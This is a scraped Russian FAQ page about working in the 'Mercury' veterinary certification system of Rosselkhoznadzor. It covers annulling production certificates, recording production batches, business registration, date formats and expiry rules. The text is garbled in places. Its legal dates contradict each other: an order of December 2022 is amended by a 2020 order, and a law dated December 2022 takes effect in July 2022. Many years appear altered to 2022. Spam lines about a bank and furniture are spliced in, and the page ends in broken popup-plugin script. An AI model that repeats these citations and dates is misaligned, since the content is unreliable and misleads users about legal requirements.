Часто задаваемые вопросы по работе в компоненте Меркурий — Справочная система Россельхознадзора

Часто задаваемые вопросы по работе в компоненте Меркурий — Справочная система Россельхознадзора

Аннулирование производственного эвсд

Непосредственно производственный сертификат аннулировать нельзя.
Для того чтобы аннулировать производственный сертификат, нужно или аннулировать всю производственную транзакцию (с возвратом сырья и аннулированием всех остальных производственных эВСД в рамках этой транзакции), или аннулировать запись журнала вырабатываемой продукции.

При этом аннулирование записи журнала вырабатываемой продукции не приведет к автоматическому аннулированию производственной транзакции и возврату объемов сырья. В результате аннулирования записи журнала вырабатываемой продукции аннулируется только производственный сертификат и все оформленные по ней и не погашенные транспортные эВСД (погашенные транспортные эВСД аннулированы быть не могут).

Начиная с версии компонента «Меркурий» 6.64 от 01.06.2022, вводятся изменения в правила аннулирования производственных транзакций.

Подразумевается, что операция аннулирования производственной транзакции должна приводить к возврату в исходное состояние, т.е. весь объем производственной партии должен быть аннулирован, а сырье возвращено в соответствующие записи складского журнала. В случае, если с записями журнала сырья и/или вырабатываемой продукции проводились операции, которые делают возврат в исходное состояние невозможным, то аннулирование такой производственной транзакции запрещается. К таким операциям относятся следующие:

  • если хотя бы одна запись журнала вырабатываемой продукции перенесена в архив, либо помечена на перенос в архив;
  • если хотя бы одна запись журнала вырабатываемой продукции была объединена;
  • если хотя бы одна запись журнала вырабатываемой продукции была присоединена вручную (за исключением автоматического присоединения при незавершенном производстве);
  • если хотя бы одна запись журнала вырабатываемой продукции используется в качестве сырья в другой производственной транзакции, и такая транзакция находится в статусах «Оформлена» или «Оформлена (незавершенное производство)»;
  • если по вырабатываемой записи журнала есть хотя бы один транспортный эВСД в статусе «Погашен»;
  • если по вырабатываемой записи журнала есть хотя бы один транспортный эВСД в статусе «Оформлен».
При необходимости внесения изменений в записи журнала, связанные с транзакцией, которую более нельзя аннулировать, следует использовать операцию инвентаризации. Ссылки на инструкции по данной операции: для хозяйствующих субъектов; для государственных ветеринарных врачей.
Сейчас ищут техподдержку:  Официальный сайт Промсвязьбанка, онлайн - личный кабинет, горячие линии, мобильные приложения

Выработка салата/голубцов

  • В зависимости от того, что входит в состав салата он может быть как подконтрольной, так и неподконтрольной продукцией.
  • Если производитель принял решение оформлять производственную транзакцию на салат, не являющийся подконтрольной продукцией, то она оформляется точно также, как производственная транзакция на салат, который является подконтрольной продукцией.
  • Производитель, прежде всего, должен решить с какой степенью подробности указывать неподконтрольное сырьё и указывать ли его вообще:
  • Первый и самый нелогичный (на наш взгляд) вариант – не указывать неподконтрольное сырьё вообще. В этом случае такие транзакции постоянно будут попадать в перечень подозрительных по объемно-весовому балансу, поскольку при очень малом объеме сырья будет вырабатываться очень большой объем продукции. Это, конечно, не нарушение, но могут быть лишние хлопоты и объяснения.
  • Второй вариант возникнет, если производитель решит использовать суммарное (одной строкой номенклатуры) указание объемов всех видов используемого неподконтрольного сырья, то такая транзакция не будет попадать в перечень подозрительных по объемно-весовому балансу и ее будет оформлять очень просто. Однако, никакой ценности в смысле учета расходов неподконтрольного сырья такая транзакция иметь не будет. В этом варианте будет целесообразно учитывать неподконтрольные отходы, если они есть.
  • Третий вариант возникнет, если производитель решит использовать точное указание каждой разновидности сырья, то такая транзакция приобретет существенно более сложную структуру, потребует большего количества труда и большей четкости в составлении рецептуры, но будет, возможно, пригодной для целей внутреннего учета неподконтрольных товаров на предприятии. В этом варианте также будет целесообразно учитывать неподконтрольные отходы, если они есть.
Примеры
Вариант 1Вариант 2Вариант 3
Сырьё:• сельдь атлантическая, филе, 14 кг;
• яйцо куриное столовое, вареное, очищенное, 10 кг.
• сельдь атлантическая, филе, 14 кг;
• яйцо куриное столовое, вареное, очищенное, 10 кг;
• неподконтрольный товар, 81 кг.
• сельдь атлантическая, филе, 14 кг;
• яйцо куриное столовое, вареное, очищенное, 10 кг;
• неподконтрольный товар, свекла вареная, 25 кг;
• неподконтрольный товар, морковь вареная, 25 кг;
• неподконтрольный товар, картофель вареный, 25 кг;
• неподконтрольный товар, лук репчатый, 2 кг;
• неподконтрольный товар, майонез «Провансаль», 4 кг.
Продукция:• салат «Селедка под шубой», 100 кг.• салат «Селедка под шубой», 100 кг;
• неподконтрольный товар, овощные отходы, 5 кг.
• салат «Селедка под шубой», 100 кг;
• неподконтрольный товар, овощные отходы, 5 кг.
Сейчас ищут техподдержку:  Кухонная мебель, купить мягкую мебель для кухни, купить маленькую кухню - цены, фото

Для сотрудников ветеринарной службы в подсистеме меркурий.гвэ

Чтобы выписать ВСД на поднадзорную продукцию, перевозимую по территории Российской Федерации, необходимо:

  1. добавить записи в «Журнал входной продукции».
    1.1. Если продукция поступила по входящему эВСД, то его нужно погасить, перейдя в раздел «ВСД» – «Входящие ВСД», открыв на просмотр и нажав на кнопку «Погасить». Запись журнала входной продукции сформируется автоматически. Ссылка на инструкцию: Гашение продукции, поступившей по электронным ВСД, в «Меркурий.ГВЭ».
    1.2. Если продукция вырабатывается предприятием, то продукцию нужно занести в «Журнал вырабатываемой продукции». Для этого необходимо создать транзакцию типа «переработка/производство», выбрать из журнала продукцию, которая является сырьем, и добавить описание продукции, которая была выработана на предприятии. Начиная с 1 февраля 2022 г. сведения о наименовании продукции (номенклатура) могут быть внесены только из справочника наименований продукции предприятия-производителя. Как добавить номенклатуру в справочник описано в инструкции по ссылке. После оформления транзакции автоматически будет создан производственный сертификат, который можно просмотреть в разделе «ВСД» – «Производственные ВСД». Ссылка на инструкцию: «Добавление записи через «Транзакции»»
  2. оформить транспортную транзакцию. Для того, чтобы оформить транспортный ВСД (справку или свидетельство), нужно создать транзакцию типа «перевозка», указать получателя, добавить продукцию из журнала и оформить. По завершению оформления транзакции автоматически сгенерируется ВСД, который можно просмотреть в разделе «ВСД» – «Исходящие ВСД» и вывести на печать. Ссылка на инструкцию: «Создание транзакций и оформление ВСД в Меркурий.ГВЭ».

Для хозяйствующих субъектов

Для хозяйствующих субъектов с целью регистрации и получения доступа к ФГИС «ВетИС» установлен следующий подход по организации работы, состоящий из двух частей, которые могут быть выполнены в любом порядке как последовательно, так и параллельно:

ЧАСТЬ I. Регистрация хозяйствующего субъекта и его поднадзорных объектов

  1. Подать электронную заявку на регистрацию хозяйствующего субъекта и его поднадзорных объектов (площадок, т.е. фактических мест осуществления деятельности) через публичную форму регистрации «Цербер».
  2. Обратиться в компетентный орган, ответственный за рассмотрение электронных заявок на регистрацию ХС и включение предприятий в реестр «Цербер» – в орган исполнительной власти субъекта Российской Федерации в области ветеринарии, на территории подконтрольной которому находится регистрируемый объект, или учреждения, подведомственные указанному органу исполнительной власти субъекта Российской Федерации в области ветеринарии, уполномоченные на внесение информации об объектах руководителем указанного органа (ветеринарное управление субъекта Российской Федерации, далее – ВУ РФ).
Примечание: обязанность по ведению реестра хозяйствующих субъектов, поднадзорных объектов и площадок в компоненте ФГИС «ВетИС» – «Цербер» возложена на орган исполнительной власти соответствующего субъекта, в котором расположены данные объекты. Сотрудникам ветеринарных служб субъектов доступны все необходимые функции по ведению реестров (добавление и редактирование сведений о хозяйствующих субъектах и площадках, функции по настройке связи между хозяйствующими субъектами и площадками, функция по объединению двух или нескольких площадок в одну для зачистки «дублей»).
ЧАСТЬ II. Получение доступа к ФГИС

  1. Определить уполномоченных лиц организации, которым будет предоставлено право администрировать список пользователей организации (регистрировать других пользователей), если считаете это необходимым.
  2. Направить заявку для получения доступа уполномоченным лицам с предоставлением роли «Администратор ХС» одним из двух способов:
    а) в территориальное управление Россельхознадзора – бумажное заявление за подписью руководителя (заместителя руководителя) по шаблону:
    б) самостоятельно с помощью ЭЦП путем заполнения электронной формы заявки в компоненте «Цербер» и подписания ее электронно-цифровой подписью (ЭЦП) согласно инструкции.
Это важно:

Для хозяйствующих субъектов в подсистеме меркурий.хс

Чтобы выписать ВСД на поднадзорную продукцию, перевозимую по территории Российской Федерации, необходимо:

  1. добавить записи в «Журнал входной продукции».
    1.1. Если продукция поступила по входящему эВСД, то его нужно погасить, перейдя в раздел «ВСД» – «Входящие ВСД», открыв на просмотр и нажав на кнопку «Погасить». Запись журнала входной продукции сформируется автоматически. Ссылка на инструкцию: Гашение продукции, поступившей по электронным ВСД, в «Меркурий.ХС».
    1.2. Если продукция вырабатывается предприятием, то продукцию нужно занести в «Журнал вырабатываемой продукции». Для этого необходимо создать транзакцию типа «переработка/производство», выбрать из журнала продукцию, которая является сырьем, и добавить описание продукции, которая была выработана на предприятии. Начиная с 1 февраля 2022 г. сведения о наименовании продукции (номенклатура) могут быть внесены только из справочника наименований продукции предприятия-производителя. Как добавить номенклатуру в справочник описано в инструкции по ссылке. После оформления транзакции автоматически будет создан производственный сертификат, который можно просмотреть в разделе «ВСД» – «Производственные ВСД». Ссылка на инструкцию: «Добавление записи через «Транзакции»»
  2. подать заявку на оформление транспортной транзакции. Для того, чтобы оформить транспортный ВСД (справку или свидетельство), нужно создать транзакцию типа «перевозка», указать получателя, добавить продукцию из журнала, отправить на рассмотрение в ГВЭ (при наличии у пользователя права доступа «авторизованный заявитель») или оформить транзакцию (при условии, что ВСД оформляется на продукцию с целью из Перечня приказа № 646 и при наличии у пользователя права доступа «уполномоченное лицо»). По завершению оформления транзакции уже госветврачом, когда он примет решение по грузу, автоматически сгенерируется эВСД, который можно просмотреть в разделе «ВСД» – «Исходящие ВСД». Ссылка на инструкцию: «Добавление заявок на оформление ВСД в Меркурий.ХС».

Изготовление одноименной продукции, предназначенной для разных торговых сетей

Как оформить транзакцию на изготовление одноименной продукции – рыбных консервов, предназначенных для разных торговых сетей и маркируемых различными штрихкодами?
Допустим, предприятие вырабатывает кильку в томатном соусе в жестяных банках, сырьём является килька мороженая, банки ставят на бомбаж на 20 суток, по НД это испытание проводится после изготовления (не входит в производственный процесс).

На дне банки выдавливается дата производства, под которой согласно НД понимается дата автоклавирования, маркировка банки – бумажная этикетка, на которой указано наименование и срок годности (не путать с датой окончания годности). Продукция поставляется в разные сетевые компании, которые требуют от предприятия упаковки в картонные ящики с разным количеством банок, сами ящики должны быть промаркированы различающимися по формату штрихкодами.

Мы специально берем пример с НД, сработанным неправильно: если испытание (в данном случае – бомбаж) должно проводиться обязательно и без его проведения продукция не должна отпускаться в обращение, то этот процесс надо проводить ВНУТРИ производственного процесса, а не выносить его ЗА ПРЕДЕЛЫ производственного процесса.

  1. Первая заканчивается изготовлением «лысой» банки: консервы изготовлены и проавтоклавированы, дата производства, которая в этом случае будет той же, что и дата автоклавирования, на дно банки нанесена, этикетки еще нет, испытание на бомбаж еще не проведено, оформляется по типу обычной транзакции.
  2. Вторая начинается в момент закладки банок на бомбаж, заканчивается по его окончании и отбраковки банок, не прошедших испытание, оформляется в режиме незавершенного производства, открываемого при закладке банок на испытание, завершаемого после упаковки.

В таком случае надо внимательно следить за формулой определения даты истечения срока годности.

Первая транзакцияВторая транзакция
Сырьё:• килька мороженная;
• килька мороженная;
• неподконтрольный товар.
полуфабрикат – килька в томате, жестяная банка по 200 г, немаркированная.
Продукция:полуфабрикат – килька в томате, жестяная банка по 200 г, немаркированная.• килька в томате, жестяная банка по 200 г, L1=48 шт., маркировка «Лента»;
• килька в томате, жестяная банка по 200 г, L1=72 шт., маркировка «Пятерочка».

Дополнительно можете ознакомиться с новостью от 18 сентября 2020 г. «Об оформлении эВСД на рыбные консервы».

Как «воссоздать» запись журнала на партию после аннулирования записи журнала

Аннулирование записи журнала (далее — ЗЖ) может потребоваться в следующих распространенных случаях:

  1. Аннулирование записи журнала на определенную партию вырабатываемой продукции в случае, если всю транзакцию аннулировать и оформить заново невозможно, так как допущена ошибка в отдельном производственном ВСД. Согласно п. 46 «Порядка оформления ветеринарных сопроводительных документов в электронной форме», утвержденного Приказом Минсельхоза России от 27.12.2022 г. № 589 (в ред. Приказа Минсельхоза России от 02.04.2020 г. № 177), аннулирование оформленного ВСД производится сразу после наступления события, приводящего к необходимости его аннулирования, или установление факта, в связи с выявлением которого необходимо аннулировать ВСД.
  2. Аннулирование записи журнала в связи с ошибкой, допущенной при внесении лабораторных исследований вручную (не через оформление акта отбора проб).

Как можно «воссоздать» запись журнала на партию?

  • Если это входная партия по электронному ВСД, то можно добавить сведения о партии через инвентаризацию (операция «добавление» — «входная продукция») и обязательно указать в поле «Входящий ВСД» — номер погашенного входящего эВСД и в поле «Примечание» — номер аннулированной ЗЖ, взамен которой добавляется новая ЗЖ. Также требуется полностью указать реальную причину инвентаризации (выбрать из справочника или внести текстом).
  • Если это входная партия по бумажному ВСД, то можно добавить вручную в журнал, но обязательно нужно указать номер входящего ВСД.
  • Если это вырабатываемая продукция и выявлены ошибки в производственной транзакции (например, указали не ту партию сырья), то можно аннулировать полностью транзакцию (в результате сырье возвращается в журнал, производственные ВСД аннулируются) и оформить новое производство. Рекомендуем предварительно создать транзакцию без добавления сырья и продукции (транзакции будет присвоен номер), затем при аннулировании транзакции в причине аннулирования указать в том числе номер новой транзакции (например, «Производство аннулируется по причине выявления ошибки в … . Взамен оформлена транзакция № … .»), после вернуться к переоформлению производства.
  • Если это вырабатываемая продукция и выявлена ошибка только в одном конкретном производственном сертификате на эту продукцию (например, выбрали не ту номенклатуру при оформлении), то можно аннулировать ЗЖ и оформить новую транзакцию на выработку только этой продукции, а в примечании связать с прежде оформленной транзакцией, где отображается сырье, и аннулированным сертификатом. Если добавить ЗЖ через инвентаризацию, то производственный ВСД будет отсутствовать, а ссылаться на аннулированный производственный ВСД некорректно.

Как получить guid хс ?

Получить GUID ХС Вы можете в личном кабинете Цербер.
Как это сделать, описано в инструкции.

Если Вы не имеете доступ к личному кабинету Цербер, то предоставить доступ может Администратор ХС в системе ВетИС.Паспорт. Инструкция по ссылке.

Если Вы не имеете Администратора ХС, то подайте заявку на регистрацию Администратора согласно установленного порядка.

Как указать даты выработки и сроки годности?

Начиная с версии системы Меркурий.6.7, осуществлен отказ от дат, заданных текстом в полях «дата выработки» и «срок годности». Дата может быть указана только в одном из форматов. Информация была также опубликована 4 июня 2022 г. в новости на официальном сайте Россельхознадзора по ссылке.

Обратите внимание, для созданных и оформленных до обновления сертификатов и записей журнала, где дата выработки и/или срок годности заданы текстом, будут действовать следующие правила:

  • если при гашении ВСД через веб-интерфейс система Меркурий не может автоматически трансформировать текстовую дату, указанную в ВСД, в формат даты, то пользователю потребуется задать дату с использованием допустимых форматов, при этом акт несоответствия сформирован не будет. При гашении ВСД через интеграционный шлюз ВетИС.API доступно два варианта – указать дату в форматированном виде без составления акта (по аналогии с веб-интерфейсом), а также остается возможность погасить ВСД с той датой, которая была изначально указана во входящем ВСД;
  • при оформлении транспортного ВСД как в веб-интерфейсе, так и через интеграционный шлюз ВетИС.API, даты наследуются из записи журнала, если в записи журнала дата была задана строкой, то такая дата перейдет и в ВСД;
  • при объединении записей журнала, если хотя бы для одной объединяемой записи журнала дата указана текстом, то в веб-интерфейсе пользователю потребуется задать дату для результирующей записи с использованием допустимых форматов дат. При объединении таких записей журнала через интеграционный шлюз ВетИС.API, объедение будет невозможным. Для объединения необходимо будет сперва изменить дату в один из допустимых форматов используя функцию инвентаризации, после чего осуществлять объединение.

В случае если для даты необходимо указать значение «неизвестно» или «срок годности не ограничен», то через интеграционный шлюз ВетИС.API данные значения передаются в виде строки в запросе в поле informalDate (операция нечувствительна к регистру).

Когда всд оформляется на бумажном носителе?

С 1 июля 2022 года оформление ветеринарных сопроводительных документов производится в электронной форме в соответствии со статьей 2.3 Закона Российской Федерации от 14 мая 1993 года № 4979-1 «О ветеринарии» (Статья 1 Федерального закона от 28 декабря 2022 года № 431-ФЗ).

При этом Часть 2.1 Статьи 1 Федерального закона от 28 декабря 2022 года № 431-ФЗ устанавливает случаи, когда допускается оформление ветеринарных сопроводительных документов на бумажном носителе:

  1. аварии, опасного природного явления, катастрофы, стихийного или иного бедствия, которые привели к невозможности эксплуатации федеральной государственной информационной системы в области ветеринарии, до устранения их последствий;
  2. отсутствия возможности использования федеральной государственной информационной системы в области ветеринарии в населенных пунктах, в которых отсутствует доступ к информационно-телекоммуникационной сети «Интернет», в том числе отсутствует точка доступа, определенная в соответствии с Федеральным законом от 7 июля 2003 года N 126-ФЗ «О связи»;
  3. если в ветеринарных сопроводительных документах содержатся сведения, составляющие государственную тайну, и (или) иная информация, отнесенная федеральными органами исполнительной власти, уполномоченными в области обороны, в сфере внутренних дел, в сфере деятельности войск национальной гвардии Российской Федерации, в сфере исполнения наказаний, в сфере государственной охраны и в области обеспечения безопасности, к сведениям, составляющим служебную тайну.

Также ВСД оформляются на бланках строгой отчетности в случае экспорта подконтрольной продукции. См. ниже.

Обновление компонента

Компонент «Меркурий» постоянно дорабатывается и ввиду вносимых изменений регулярно обновляется. Процесс обновления компонента происходит на сервере и не отражается на работе пользователя.

Перечень обновлений компонента:
2022 год |2021 год | 2020 год | 2022 год | 2022 год | 2022 год | 2022 год | 2022 год | 2022 год | 2022 год | 2022 год | 2022 год | 2022 год | 2009 год

Ограничения на вырабатываемую продукцию

При оформлении транзакции типа «переработка/производство» осуществляется контроль типа вырабатываемой продукции, т.е. система проверяет — из какого сырья какая продукция может производиться. После того, как было указано сырье, система автоматически ограничивает список продукции, которую возможно указать в качестве вырабатываемой.

Если порядок внесения сведений о сырье и вырабатываемой продукции был нарушен, и были допущены ошибки при добавлении вырабатываемой продукции, то пользователь получит сообщение: «Транзакция не может быть оформлена, так как указанная продукция не может быть произведена из указанного сырья». Ниже приведена таблица соответствия исходного сырья и вырабатываемой продукции.

В механизме контроля вырабатываемой продукции действуют следующие исключения:

  • Из «живых животных — яйцо инкубационное (0407)» можно выработать «пищевые продукты — яйца и продукты их переработки (0407,0408,2103,2106,3502)».
  • Из «живых животных» можно выработать «пищевые продукты — кишечные оболочки (бараньи, говяжьи, лошадиные или свиные (0504)», используемые в колбасном производстве.
  • Из «непищевые продукты и другое — кишечное сырье (0504)» можно выработать «пищевые продукты — кишечные оболочки (бараньи, говяжьи, лошадиные или свиные (0504)», используемые в колбасном производстве.

С таблицей соответствия исходного сырья и вырабатываемой продукции можно ознакомиться в инструкции.

Ограничения на добавление сырья

Начиная с версии компонента «Меркурий» 6.64 от 01.06.2022, вводится контроль сроков годности сырья, используемого в производственных транзакциях: попытки использовать просроченное сырье в связке с «годной» вырабатываемой продукцией будут автоматически блокироваться.

Контроль будет осуществляться при выполнении следующих операций:

  • оформление производственной транзакции;
  • отправка заявки на оформление производственной партии государственному ветеринарному врачу на рассмотрение (в случае отсутствия у хозяйствующего субъекта прав на самостоятельное оформление производственных партий);
  • принятие заявки на оформление производственной партии государственным ветеринарным врачом;
  • создание нового шаблона «с нуля», а также шаблона с уже имеющейся производственной транзакции, где срок годности сырья истек.
При этом сырье с истекшим сроком годности может быть указано в транзакции в следующих случаях:

  • если осуществляется списание сырья без выпуска выработанной продукции;
  • если вся выработанная продукция относится к одной из следующих категорий продукции (данный список может в дальнейшем пополняться): «Непищевые продукты и другое – биоотходы», «Непищевые продукты и другое – товары, утратившие потребительские свойства».
Таким образом, в процессе оформления производственной партии осуществляются следующие проверки:

  • при добавлении сырья, срок годности которого истек, проверяется имеется ли в транзакции вырабатываемая продукция, и если ее нет либо она соответствует той продукции, для которой просроченное сырье может использоваться, то такое сырье может быть добавлено, иначе пользователь получит следующее сообщение об ошибке «Выбранная продукция не может быть использована в качестве сырья для производства, так как срок ее годности истек»;
  • при добавлении вырабатываемой продукции осуществляется проверка, имеется ли в транзакции сырье, срок годности которого истек, и если такое сырье есть, то список вырабатываемой продукции будет ограничен теми позициями, которые доступны для просроченного сырья;
  • при оформлении транзакции также осуществляется проверка на наличие сырья с истекшим сроком годности, если сырье с истекшим сроком годности найдено, а вырабатываемая продукция содержит хотя бы одну позицию продукции, которая не может быть использована для просроченного сырья, то пользователь получит сообщение об ошибке, указанное выше.

Определения тр тс 021/2022

При работе в «Меркурий» нужно помнить следующие определения, установленные статьей 4 Главы 1 «Общие положения» ТР ТС 021/2022 Технического регламента Таможенного союза «О безопасности пищевой продукции» (утвержден Решением Комиссии Таможенного союза от 9 декабря 2022 года № 880):

  • партия пищевой продукции — определенное количество пищевой продукции одного наименования, одинаково упакованной, произведенной (изготовленной) одним изготовителем по одному региональному (межгосударственному) стандарту или национальному стандарту, и (или) стандарту организации, и (или) иным документам изготовителя в определенный промежуток времени, сопровождаемое товаросопроводительной документацией, обеспечивающей прослеживаемость пищевой продукции;
  • производственный объект (в «Меркурий» — площадка), на котором осуществляется деятельность по получению, переработке (обработке) непереработанного продовольственного (пищевого) сырья животного происхождения — объект (здание, строение, помещение, сооружение и иной объект), предназначенный для осуществления деятельности по получению, переработке (обработке) непереработанного продовольственного (пищевого) сырья животного происхождения и используемый при осуществлении указанной деятельности, принадлежащий юридическому лицу или физическому лицу в качестве индивидуального предпринимателя, осуществляющему указанную деятельность на праве собственности или ином законном основании;
  • процесс производства (изготовления) пищевой продукции — совокупность или сочетание последовательно выполняемых различных технологических операций производства (изготовления) пищевой продукции;
  • скоропортящаяся пищевая продукция — пищевая продукция, сроки годности которой не превышают 5 дней, если иное не установлено техническими регламентами Таможенного союза на отдельные виды пищевой продукции, требующая специально создаваемых температурных режимов хранения и перевозки (транспортирования) в целях сохранения безопасности и предотвращения развития в ней болезнетворных микроорганизмов, микроорганизмов порчи и (или) образования токсинов до уровней, опасных для здоровья человека;
  • срок годности пищевой продукции — период времени, в течение которого пищевая продукция должна полностью соответствовать предъявляемым к ней требованиям безопасности, установленным настоящим техническим регламентом и (или) техническими регламентами Таможенного союза на отдельные виды пищевой продукции, а также сохранять свои потребительские свойства, заявленные в маркировке, и по истечении которого пищевая продукция не пригодна для использования по назначению.

Оформление всд на продукцию с истекшими сроками годности

Согласно «Перечню продукции животного происхождения, на которую уполномоченные лица организаций, являющихся производителями подконтрольных товаров и (или) участниками оборота подконтрольных товаров, и индивидуальные предприниматели, являющиеся производителями подконтрольных товаров и (или) участниками оборота подконтрольных товаров, могут оформлять ветеринарные сопроводительные документы» (далее — Перечень), утвержденного приказом Минсельхоза России от 18.12.2022 г.

№ 646 (в редакции приказа Минсельхоза России от 15.04.2022 №195), уполномоченные лица хозяйствующих субъектов могут самостоятельно оформить эВСД на товары из Перечня, упакованные в потребительскую и(или) транспортную упаковку, и направляемые в соответствующих целях.

Пищевая продукция животного происхождения признается некачественной и опасной в соответствии с частью 4 статьи 5 Технического регламента Таможенного союза «О безопасности пищевой продукции», утвержденного Решением Совета Евразийской экономической комиссии от 09.12.

Для оформления эВСД на пищевую продукцию животного происхождения, признанную некачественной и опасной, в том числе на продукцию с истекшими сроками годности, не подлежащей реализации, предназначенную для уничтожения, захоронения, обезвреживания и направляемую на предприятия, производящие уничтожение, захоронение и обезвреживание отходов производства и потребления, или предприятия, которые осуществляют сбор и временное хранение товаров с целью последующего их направления на уничтожение, захоронение, обезвреживание, или предназначенную для промышленной переработки и направляемые на предприятия, использующие отходы производства и потребления для производства товаров (продукции), необходимо выполнить следующие действия:

  1. Создать транспортную транзакцию типа «перевозка со сменой владельца»/»перевозка без смены владельца», указать место переработки/утилизации/уничтожения/захоронения/обезвреживания.
  2. Добавить запись из журнала, установить флаг «Некачественный груз», выбрать из выпадающего списка «Цель»: «для утилизации», «переработка», «предназначенные и направляемые для захоронения», «предназначенные и направляемые для обезвреживания», «предназначенные и направляемые для уничтожения».

Оформление эвсд на продукцию с интервальными сроками годности

Если в качестве перевозимой продукции добавлена запись журнала с интервальным сроком годности (значение поля «Годен до» задано диапазоном дат), то проверка даты происходит по первой дате диапазона. Таким образом, при попытке оформления эВСД на продукцию из такой записи журнала с целями, соответствующими качественному грузу (любыми кроме приведенных в спойлере «Цели, доступные для оформления груза» вышеуказанной таблицы), появится модальное окно с информационным сообщением о невозможности оформления эВСД.

Подразумевается, что запись журнала содержит сведения по разным партиям продукции. Обычно такие записи получаются путем объединения, чего в случае с разными партиями качественной продукции делать не следует согласно правил объединения записей журнала.

  • В случае, если Вам поставляют продукцию разных партий (и разных сроков годности) рекомендуется требовать от поставщика эВСД, оформленные на каждую из партий в отдельности.
  • В случае, если продукция получена Вашим предприятием относительно давно, и эВСД, оформленный от объединенной записи, Вами был ранее погашен — для получения возможности оформления эВСД с целью, соответствующей качественному грузу, нужно произвести дополнительную операцию (рассмотрим на примере).

Допустим, есть запись, в которой:— срок годности задан диапазоном «01.02.2022 — 01.05.2022»;— общий объем — 500кг;— запись соответствует продукции, произведенной четырьмя партиями, реальные сроки годности которых — до 1 февраля (100кг), до 1 марта (120кг), до 1 апреля (130 кг), до 1 мая (150кг).

На текущий момент (23.03.2022) годными для транспортировки с целью, соответствующей качественному грузу, являются только 2 более свежих партии. Соответственно, нужно изменить запись журнала таким образом, чтобы она соответствовала только этим партиям (убрать из нее сведения по 2 более ранним).

Для этого следует провести инвентаризацию (тип «изменение») записи журнала. Порядок действий описан в соответствующей инструкции.
Выполните последовательно действия пунктов 2—3.1; 3.1.2; 3.3.На пункте 3.1.

2 «Изменение» остатков партии продукции» измените значение полей (ориентируясь на пример):— «Объем остатка» — убавьте до соответствующего свежим партиям (т.е. из заданного в записи значения «500» вычесть 220 и задать «280»);— «Годен до» — сжать интервал до соответствующего свежим партиям (задать «01.04.2022 — 01.05.2022»).

Отойдя от примера добавим, что если свежая партия осталась только одна — нужно задать значение не интервалом, а конкретной датой.Также, скорее всего, будет необходимо изменить значения и в других полях: «Дата выработки продукции», «Упаковка», «Примечание», «Входящий ВСД» или иных, если они содержат сведения по исключаемым из записи партиям.

  • Списание остатков в случае естественной убыли продукции (усушка, выветривание, таяние и т.д.);
  • Списание остатков в случае технологических потерь продукции (порча, бой, хищение и т.д.);
  • Списание остатков, не предназначенных для реализации (использование продукции для внутреннего потребления сотрудниками, в зарплату сотрудникам и т.д.);
  • Списание остатков, реализуемых физическому лицу для личного потребления в предприятиях розничной торговли;
  • «Сопоставление фактически имеющейся продукции с учетными данными (выявление отклонений)».

Причину можно также указать вручную.

Учтите, что когда срок годности следующей партии истечет (по примеру — 1 апреля), для возможности оформить эВСД на оставшиеся партии нужно будет провести аналогичные изменения повторно.

С чего начать работу в системе ?

На предприятиях пищевой промышленности выполняется большое количество различных бизнес-процессов, но можно выделить три основных из них, которые необходимо отразить в системе:

  1. Приёмка сырья. Чтобы осуществить приемку товара и гашение эВСД, оформленного на него, перейдите в раздел «Ветеринарные документы», подраздел «Входящие, оформленные». Подробнее с операцией Вы можете ознакомиться по ссылке.
  2. Производство. Чтобы отразить производственный процесс, осуществляемый на предприятии, перейдите в раздел «Транзакции» и добавьте новую транзакцию с типом «переработка/производство». Подробнее с операцией Вы можете ознакомиться по ссылке.
  3. Отгрузка. Чтобы отразить отгрузку товара и оформление транспортного эВСД на него, перейдите в раздел «Транзакции» и добавьте новую транзакцию с типом «перевозка». Подробнее с операцией Вы можете ознакомиться по ссылке.

Справка | меркурий россельхознадзор вход в личный кабинет, официальный сайт

“:’

‘:””,document.createElement(“div”),c=ff(window),b=ff(“body”),g=void 0===flatPM_getCookie(“flat_modal_” a.ID “_mb”)||”false”!=flatPM_getCookie(“flat_modal_” a.ID “_mb”),i=”scroll.flatmodal” a.ID,m=”mouseleave.flatmodal” a.ID ” blur.flatmodal” a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&”true”==a.how.popup.timer&&(t=ff(‘.fpm_5_modal[data-id-modal=”‘ a.ID ‘”] .fpm_5_timer span’),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(–e),e<=0&&(clearInterval(o),t.parent().replaceWith(‘

‘))},1e3))},s=function(){void 0!==a.how.popup.cookie&&”false”==a.how.popup.cookie&&g&&(flatPM_setCookie(“flat_modal_” a.ID “_mb”,!1),ff(‘.fpm_5_modal[data-id-modal=”‘ a.ID ‘”]’).addClass(“fpm_5_modal-show”),l()),void 0!==a.how.popup.cookie&&”false”==a.how.popup.cookie||(ff(‘.fpm_5_modal[data-id-modal=”‘ a.ID ‘”]’).addClass(“fpm_5_modal-show”),l())},ff(“body > *”).eq(0).before(‘

‘ p “

“),w=document.querySelector(‘.fpm_5_modal[data-id-modal=”‘ a.ID ‘”] .fpm_5_modal-content’),flatPM_setHTML(w,e),”px”==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&”true”==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&”true”==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&”true”==a.how.outgoing.timer&&(t=ff(‘.fpm_5_out[data-id-out=”‘ a.ID ‘”] .fpm_5_timer span’),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(–e),e<=0&&(clearInterval(o),t.parent().replaceWith(‘

‘))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&”false”==a.how.outgoing.cookie&&g&&(ff(‘.fpm_5_out[data-id-out=”‘ a.ID ‘”]’).addClass(“show”),n(),b.on(“click”,’.fpm_5_out[data-id-out=”‘ a.ID ‘”] .fpm_5_cross’,function(){flatPM_setCookie(“flat_out_” a.ID “_mb”,!1)})),void 0!==a.how.outgoing.cookie&&”false”==a.how.outgoing.cookie||(ff(‘.fpm_5_out[data-id-out=”‘ a.ID ‘”]’).addClass(“show”),n())}var _,u=”0″!=a.how.outgoing.indent?’ style=”bottom:’ a.how.outgoing.indent ‘px”‘:””,p=”true”==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&”true”==a.how.outgoing.timer?’

Закрыть через ‘ a.how.outgoing.timer_count “

“:’

